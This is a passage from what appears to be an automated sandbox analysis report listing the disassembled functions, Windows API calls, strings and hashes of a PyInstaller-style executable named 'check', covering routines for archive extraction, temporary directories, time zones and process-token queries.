RemoveDirectoryW.KERNEL32(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84AE
DeleteFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84CD
FindNextFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84DB
FindClose.KERNEL32(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84EC
RemoveDirectoryW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84F5

Strings

%s\*, xrefs: 00007FF61E8E83F2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 0bf683ff4c961378b41eee883d85e3026d2ac74c13c37af28762a41f8004205f
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: DB416031A1CE4285EAA09B65E5441BEA364FBA4F78F840632F99EC26D5EF3CF5458700

Function 00007FF61E905E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF61E905EAA

Part of subcall function 00007FF61E9055F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E90560C

_get_daylight.LIBCMT ref: 00007FF61E905EBB

Part of subcall function 00007FF61E905598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055AC

_get_daylight.LIBCMT ref: 00007FF61E905ECC

Part of subcall function 00007FF61E9055C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055DC

Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61E90610C), ref: 00007FF61E905EF3

Strings

Eastern Summer Time, xrefs: 00007FF61E905FB1
Eastern Standard Time, xrefs: 00007FF61E905F99

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: 634e52292f880b0d47d8cf4d12656bc4a60d3ed7fa4ac7f37926705877b5238c
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 1E516132A08A4386E720DF32D8815B96765BB68FA4F808935FA4DC7A97DF3CF5418740

Function 00007FF61E8E9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF61E8E92B3
FindClose.KERNELBASE ref: 00007FF61E8E92C2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 603369393787bc3ece3f78dc7b294c0caa3d4f8e3bf3d5d134fb31a92a29d970
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 74F0A432A18F4186FBA08F64B4887667350AB94B38F440635E97E826D5DF7CE4488A00

Function 00007FF61E8E1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61E8E7F90: _fread_nolock.LIBCMT ref: 00007FF61E8E803A

_fread_nolock.LIBCMT ref: 00007FF61E8E1A1B

Part of subcall function 00007FF61E8E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF61E8E1B6A), ref: 00007FF61E8E295E

Strings

Failed to read cookie!, xrefs: 00007FF61E8E1A2B
fseek, xrefs: 00007FF61E8E19F5
Could not allocate buffer for TOC!, xrefs: 00007FF61E8E1B1B
Failed to seek to cookie position!, xrefs: 00007FF61E8E19EE
Could not allocate memory for archive structure!, xrefs: 00007FF61E8E1A61
MEI, xrefs: 00007FF61E8E1991
Error on file., xrefs: 00007FF61E8E1B8D
malloc, xrefs: 00007FF61E8E1B22
Could not read full TOC!, xrefs: 00007FF61E8E1B55
fread, xrefs: 00007FF61E8E1A32, 00007FF61E8E1B5C
calloc, xrefs: 00007FF61E8E1A68

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
Instruction ID: 95f233fd3296856e6f96b498ebe2401bb80d588c031f3218a51fe861ba638784
Opcode Fuzzy Hash: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
Instruction Fuzzy Hash: 11818171A08E8686EBA0DB15D0456F923E0EFA8F64F404431FA8EC7796DE3CF5858740

Function 00007FF61E8E1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF61E8E1742
fopen, xrefs: 00007FF61E8E1663
fwrite, xrefs: 00007FF61E8E17D1
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF61E8E17CA
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61E8E16DA
fseek, xrefs: 00007FF61E8E16E1
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61E8E17DF
malloc, xrefs: 00007FF61E8E1749
Failed to extract %s: failed to open target file!, xrefs: 00007FF61E8E165C
Failed to create symbolic link %s!, xrefs: 00007FF61E8E1622
fread, xrefs: 00007FF61E8E17E6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61E8E16A2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: de7b71eb3525e48ada22498f51af6936552d6781c49eee4e7825204e7cf27636
Instruction ID: 74b8b3610b36a744b56a79d26bf8cb2a29ef1b0f0bd00d6ae8a4bafd4f8b213e
Opcode Fuzzy Hash: de7b71eb3525e48ada22498f51af6936552d6781c49eee4e7825204e7cf27636
Instruction Fuzzy Hash: 51518C21B08E4392EA90EB5698005E96390BFA4FB4F844932FE1DC77A6EE3CF5558340

Function 00007FF61E8E8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E874C

Part of subcall function 00007FF61E8E8830: GetEnvironmentVariableW.KERNEL32(00007FF61E8E388E), ref: 00007FF61E8E8867
Part of subcall function 00007FF61E8E8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61E8E8889

Part of subcall function 00007FF61E8F8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F8251

Part of subcall function 00007FF61E8E2810: MessageBoxW.USER32 ref: 00007FF61E8E28EA

Strings

_MEI%d, xrefs: 00007FF61E8E8712
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF61E8E877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF61E8E86DC
TMP, xrefs: 00007FF61E8E869C, 00007FF61E8E87A3
TMP, xrefs: 00007FF61E8E86C2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: 80d929f23c011bd3c6d48898494b0411ea79267f2d7e8624e348f59be3afe7a8
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: 5B41AE21B29E4245FA90EB66A9552FD5294AFA4FE0F884132FD0DD77DAEE3CF5018340

Function 00007FF61E8E1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF61E8E141E
1.3.1, xrefs: 00007FF61E8E1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF61E8E12EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF61E8E1276
malloc, xrefs: 00007FF61E8E12C1, 00007FF61E8E12F6
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF61E8E12BA

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
Instruction ID: 236125ceec2b6a55a974adc561b5b03ac2cf66f9b099ae3265fea991e2212ca2
Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
Instruction Fuzzy Hash: CA519322A08E4285EAA19B16A4403FA6291FFA5FA4F844535FD4EC7BD6EE3CF545C700

Function 00007FF61E8FED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF61E8FF0AA,?,?,-00000018,00007FF61E8FAD53,?,?,?,00007FF61E8FAC4A,?,?,?,00007FF61E8F5F3E), ref: 00007FF61E8FEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF61E8FF0AA,?,?,-00000018,00007FF61E8FAD53,?,?,?,00007FF61E8FAC4A,?,?,?,00007FF61E8F5F3E), ref: 00007FF61E8FEE98

Strings

api-ms-, xrefs: 00007FF61E8FEDD6
ext-ms-, xrefs: 00007FF61E8FEDE9

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 5ecf09ba3fc20c45f0b3819bf9c3732b5730a33589d8b94544b3bd2aea7eba74
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 3241C061B19E1281EA96DB16A81067522A5BF69FB0F894939FD1DC77C4EF3CF4458200

Function 00007FF61E8E36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF61E8E3804), ref: 00007FF61E8E36E1
GetLastError.KERNEL32(?,00007FF61E8E3804), ref: 00007FF61E8E36EB

Part of subcall function 00007FF61E8E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2C9E
Part of subcall function 00007FF61E8E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2D63
Part of subcall function 00007FF61E8E2C50: MessageBoxW.USER32 ref: 00007FF61E8E2D99

Strings

\\?\, xrefs: 00007FF61E8E375A
Failed to obtain executable path., xrefs: 00007FF61E8E36F3
Failed to convert executable path to UTF-8., xrefs: 00007FF61E8E3790
Failed to resolve full path to executable %ls., xrefs: 00007FF61E8E3739
GetModuleFileNameW, xrefs: 00007FF61E8E36FA

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: d81795c65952d5a818897cead110940a50ae55d3be6a20c0e27cbeab09be352c
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: E42195A1F1CE8245FAA49B26EC153B62264BFA8F74F804636F95DC65D6EE2CF504C340

Function 00007FF61E8FBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8FBE89

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction ID: 0ed18a933bf1ae5566bf77bc387482b49b988df993e90f7402eaa082d80e515b
Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction Fuzzy Hash: 2EC1E032A0CE8691E7A19B1590402BE3B90EBA1FB0F654231FA4F83796CE7CF8458701

Function 00007FF61E8E8570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF61E8E8590
OpenProcessToken.ADVAPI32 ref: 00007FF61E8E85A3
GetTokenInformation.KERNELBASE ref: 00007FF61E8E85C8
GetLastError.KERNEL32 ref: 00007FF61E8E85D2
GetTokenInformation.KERNELBASE ref: 00007FF61E8E8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61E8E862E
CloseHandle.KERNEL32 ref: 00007FF61E8E8646

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: 6b1641e225bb048a6cbb910fe2b97b4155014182d9a74141c5c06e437b75ce08
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: F4212F31A1CE4242EA909B56B54422EA7A4EBD5FB0F540235FA6DC3AF9DE6CE4458700

Function 00007FF61E8E90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61E8E8570: GetCurrentProcess.KERNEL32 ref: 00007FF61E8E8590
Part of subcall function 00007FF61E8E8570: OpenProcessToken.ADVAPI32 ref: 00007FF61E8E85A3
Part of subcall function 00007FF61E8E8570: GetTokenInformation.KERNELBASE ref: 00007FF61E8E85C8
Part of subcall function 00007FF61E8E8570: GetLastError.KERNEL32 ref: 00007FF61E8E85D2
Part of subcall function 00007FF61E8E8570: GetTokenInformation.KERNELBASE ref: 00007FF61E8E8612
Part of subcall function 00007FF61E8E8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61E8E862E
Part of subcall function 00007FF61E8E8570: CloseHandle.KERNEL32 ref: 00007FF61E8E8646

LocalFree.KERNEL32(?,00007FF61E8E3C55), ref: 00007FF61E8E916C
LocalFree.KERNEL32(?,00007FF61E8E3C55), ref: 00007FF61E8E9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF61E8E9183
S-1-3-4, xrefs: 00007FF61E8E9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF61E8E9142
D:(A;;FA;;;%s), xrefs: 00007FF61E8E9157

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: a6f2e5d5c0d42e03fd21b266363e98fb02ab36a7e1e5d79ea0a5799b4259108b
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: AE217131A08F8282F690AB11E4152EA6265FFA8BA0F844435FA4DC3796DF7CF8448740

Function 00007FF61E8E7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF61E8E352C,?,00000000,00007FF61E8E3F23), ref: 00007FF61E8E7F32

Strings

\, xrefs: 00007FF61E8E7E97
%.*s, xrefs: 00007FF61E8E7EEB
%s%c, xrefs: 00007FF61E8E7EA4

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
Instruction ID: 3b20cef667913d013ec62c368d5e251e069dae62f6e878f71aa91a9b39c3ded6
Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
Instruction Fuzzy Hash: E531D421619EC245EAA19B22E4103EA6358EFA4FF4F440230FE6D877C9DE2CF6058700

Function 00007FF61E8FCF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8FCF4B), ref: 00007FF61E8FD07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8FCF4B), ref: 00007FF61E8FD107

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
